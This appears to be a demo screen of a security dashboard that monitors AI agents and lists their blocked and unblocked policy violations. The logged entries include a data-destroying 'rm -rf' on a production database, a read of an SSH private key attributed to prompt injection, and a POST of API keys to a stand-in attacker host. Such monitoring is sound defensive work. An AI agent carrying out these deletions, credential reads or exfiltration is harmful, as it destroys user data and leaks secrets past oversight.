AgentArm 🛡️ Security
Real-time monitoring
Active Violations Policy Configuration Violation History Threat Intelligence
Last 24 Hours
12 violations
Blocked
11
Attempted (Unblocked)
1
Critical Severity
3
Attempted: rm -rf /production/customers.db
Agent: deployer · Run #142
Critical Attempted (Not Blocked)
Command: rm -rf /production/customers.db
Policy: ⚠️ No policy configured for file deletion
Agent Context: Deploying rollback after failed migration
Time: 2 min ago (11:44 PM)
⚠️ Action was NOT blocked — no policy in place. Database may be deleted.
Investigate →
Blocked: DELETE /api/v1/users (all records)
Agent: code-reviewer · Run #47
High Blocked
API Call: DELETE https://api.example.com/v1/users
Policy: Deny-list: DELETE on /users endpoint
Agent Context: Reviewing PR #234 (test cleanup script)
Time: 5 min ago (11:41 PM)
✅ Action successfully blocked by policy
Blocked: Read /root/.ssh/id_rsa
Agent: code-reviewer · Run #46
Critical Blocked
File Access: /root/.ssh/id_rsa (SSH private key)
Policy: Deny-list: /root/.ssh/* (credential paths)
Agent Context: Reviewing deployment script in PR #235
Threat Pattern: ⚠️ Matches: Prompt Injection → Credential Exfiltration
Time: 8 min ago (11:38 PM)
✅ Action blocked. Potential prompt injection attack detected (similar to CVE-2025-32711 pattern)
Blocked: HTTP POST to external URL
Agent: deployer · Run #141
Medium Blocked
Network Call: POST https://attacker-controlled-site.com/exfil
Policy: Allow-list: Only *.example.com allowed
Payload: { "apiKey": "sk-...", "dbCreds": "..." }
Time: 12 min ago (11:34 PM)
✅ Data exfiltration attempt blocked
p policy config · h violation history · t threat intel · ? help
12 violations last 24h · 11 blocked · Updated 30s ago